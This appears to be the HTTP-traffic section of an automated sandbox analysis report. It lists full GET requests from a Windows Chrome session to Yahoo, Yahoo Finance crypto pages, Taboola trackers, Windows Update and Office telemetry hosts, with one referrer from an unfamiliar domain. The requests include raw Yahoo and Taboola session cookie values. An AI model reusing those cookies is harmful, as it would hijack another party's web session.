Source: global trafficHTTP traffic detected: GET /px.gif?ch=2&rn=6.422501612766903 HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; trc_cookie_storage=taboola%2520global%253Auser-id%3D2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9
Source: global trafficHTTP traffic detected: GET /cs/W3sibiI6InZwaXhpZWEiLCJtIjpbMTU1MDkuMjAwMDAwMDAwMDEyLDAsMCwxNTUwOS4yMDAwMDAwMDAwMTIsMTg4NjAuODk5OTk5OTk5OTk0LDE4ODc3LjUsMTg4NzcuNSwxODg3OC4yOTk5OTk5OTk5OSwxOTU5NS4yMDAwMDAwMDAwMSwxOTU5NS44OTk5OTk5OTk5OTQsMTk4NDUuMjAwMDAwMDAwMDEsMTk4NDZdLCJyIjowLCJzIjoxNzI4NDE0ODI1Mzk1LCJlIjoxNzI4NDE0ODI5NzM1LCJxIjoiaW1hZ2UiLCJwIjoiaG9tZXBhZ2UiLCJkIjoiZGVza3RvcCIsImwiOiJlbi1VUyIsImIiOiJha2Z4MXk0NTRyIn1d HTTP/1.1Host: ybar-akfx1y454rreport.wc.yahoodns.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBG6EBWcCEOtWv2vYPB4i7u8gvLT-X-kFEgEBAQHVBmcPZ9xH0iMA_eMAAA&S=AQAAAnSO_dQj16YYmcCzyCeGlyE
Source: global trafficHTTP traffic detected: GET /cs/W3sibiI6InZwaXhpZWMiLCJtIjpbXSwiciI6MiwicyI6MTcyODQxNDgyNTM5NSwiZSI6MCwicSI6ImRlZmF1bHQiLCJwIjoiaG9tZXBhZ2UiLCJkIjoiZGVza3RvcCIsImwiOiJlbi1VUyIsImIiOiJjYTlzMjU2YzVqIn1d HTTP/1.1Host: ybar-ca9s256c5jreport.wc.yahoodns.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBG6EBWcCEOtWv2vYPB4i7u8gvLT-X-kFEgEBAQHVBmcPZ9xH0iMA_eMAAA&S=AQAAAnSO_dQj16YYmcCzyCeGlyE
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/Dk0BYpDu_E2Bh.3tzsofkQ--~B/Zmk9c3RyaW07aD00MDg7dz03MjA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/0368e4b0-81be-11ef-9f53-7a1ada451b47.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cs/W3sibiI6ImNvcmVkbnMiLCJtIjpbXSwiciI6MiwicyI6MTcyODQxNDgyNTM5NSwiZSI6MCwicSI6ImRlZmF1bHQiLCJwIjoiaG9tZXBhZ2UiLCJkIjoiZGVza3RvcCIsImwiOiJlbi1VUyIsImIiOiJhdXAzbmI1cDAifSx7Im4iOiJ5Y3MiLCJtIjpbXSwiciI6MiwicyI6MTcyODQxNDgyNTM5NSwiZSI6MCwicSI6ImRlZmF1bHQiLCJwIjoiaG9tZXBhZ2UiLCJkIjoiZGVza3RvcCIsImwiOiJlbi1VUyIsImIiOiJ4a21lMmxjNG8ifV0= HTTP/1.1Host: ybar-mcdn-report.wc.yahoodns.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBG6EBWcCEOtWv2vYPB4i7u8gvLT-X-kFEgEBAQHVBmcPZ9xH0iMA_eMAAA&S=AQAAAnSO_dQj16YYmcCzyCeGlyE
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/sirEetD8VsuRx6m97CC1UA--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/ff4bcc10-81a1-11ef-adf9-70085f4f49b1.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cs/W3sibiI6ImFrYW1haSIsIm0iOlsxNTUxMC44OTk5OTk5OTk5OTQsMCwwLDE1NTEwLjg5OTk5OTk5OTk5NCwxOTY5Ny43OTk5OTk5OTk5OSwxOTcwOS43MDAwMDAwMDAwMSwxOTcwOS43MDAwMDAwMDAwMSwxOTcxMC4xMDAwMDAwMDAwMDYsMjAyNDYuODk5OTk5OTk5OTk0LDIwMjQ3LDIwMzc4LjI5OTk5OTk5OTk5LDIwMzg4LjcwMDAwMDAwMDAxXSwiciI6MCwicyI6MTcyODQxNDgyNTM5NSwiZSI6MTcyODQxNDgzMDI3NywicSI6ImltYWdlIiwicCI6ImhvbWVwYWdlIiwiZCI6ImRlc2t0b3AiLCJsIjoiZW4tVVMiLCJiIjoicndmOWJiNWhqIn0seyJuIjoiY2xvdWRmbGFyZSIsIm0iOltdLCJyIjoyLCJzIjoxNzI4NDE0ODI1Mzk1LCJlIjowLCJxIjoiZGVmYXVsdCIsInAiOiJob21lcGFnZSIsImQiOiJkZXNrdG9wIiwibCI6ImVuLVVTIiwiYiI6InJhbDI0OHo3aiJ9XQ== HTTP/1.1Host: cerebro-dns-report.wc.yahoodns.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBG6EBWcCEOtWv2vYPB4i7u8gvLT-X-kFEgEBAQHVBmcPZ9xH0iMA_eMAAA&S=AQAAAnSO_dQj16YYmcCzyCeGlyE
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A7bblgK8nv1Tko7&MD=oSn5uoTn HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/2NW2CfWeNKI57cwpeOIBFw--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-01/bedd8160-ab13-11ee-bbab-76c907c64d8d.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /yahoo-home/log/3/social?route=US:CH:V&tvi50=-50&lti=trecs&ri=f379f81c4a5bb1798375f4b7a535b500&sd=v2_4e609492ff55b48084743843e072bd5f_2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9_1728414825_1728414825_CIi3jgYQm9teGMDotOymMiABKAEw4QE4kaQOQPzYD0iry9kDUOoEWABgAGiOuMvY8NrPu1twAYABAA&ui=2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9&pi=/&wi=-2162821594718986386&pt=home&vi=1728414823488&st=social-available&d=%7B%22data%22%3A%5B%7B%22i%22%3A%22ctx%22%2C%22ism%22%3Afalse%2C%22srx%22%3A1280%2C%22sry%22%3A1024%2C%22pd%22%3Anull%2C%22tpl%22%3A%22%22%2C%22url%22%3A%22https%3A%2F%2Fwww.yahoo.com%22%2C%22rref%22%3A%22https%3A%2F%2Fortkn.lovationyme.com%2F%22%2C%22sref%22%3A%22https%3A%2F%2Fortkn.lovationyme.com%2F%22%2C%22hdl%22%3A%22Yahoo%20%7C%20Mail%2C%20Weather%2C%20Search%2C%20Politics%2C%20News%2C%20Finance%2C%20Sports%20%26%20Videos%22%2C%22sec%22%3A%22%22%2C%22aut%22%3A%5B%5D%2C%22img%22%3A%22https%3A%2F%2Fs.yimg.com%2Fcv%2Fapiv2%2Fsocial%2Fimages%2Fyahoo_default_logo.png%22%2C%22v%22%3A15%2C%22pw%22%3Afalse%7D%5D%7D&tim=15%3A13%3A51.896&id=5417&llvl=2&cv=20241006-3-RELEASE& HTTP/1.1Host: ch-trc-events.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: taboola_session_id=v2_4e609492ff55b48084743843e072bd5f_2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9_1728414825_1728414826_CIi3jgYQm9teGMDotOymMiABKAEw4QE4kaQOQPzYD0iry9kDUOoEWABgAGiOuMvY8NrPu1twAYABAA; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/hQF2Z_SG3YkVEr2UtvFbGg--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/a85cf280-84b7-11ef-84ef-7853959e0cfd.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/EqZJAXlb0unBeA1.EInqPw--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/277cf7d0-84f5-11ef-be7d-f26d36bbe250.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/hg3dbAi3sDeZI58WOrthCQ--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/f77ecae0-85a3-11ef-acff-e1584e8df32f.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /crypto/ HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /markets/crypto/ HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /cv/apiv2/09062018/manifest/yahoo_install_144.png HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rz/l/favicon.ico HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /markets/crypto/all/ HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /cv/apiv2/09062018/manifest/yahoo_install_144.png HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rz/l/favicon.ico HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/2.CP-kRmco.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/PageProgressBar.DFY6QScX.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Debug.SsTdzNxF.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
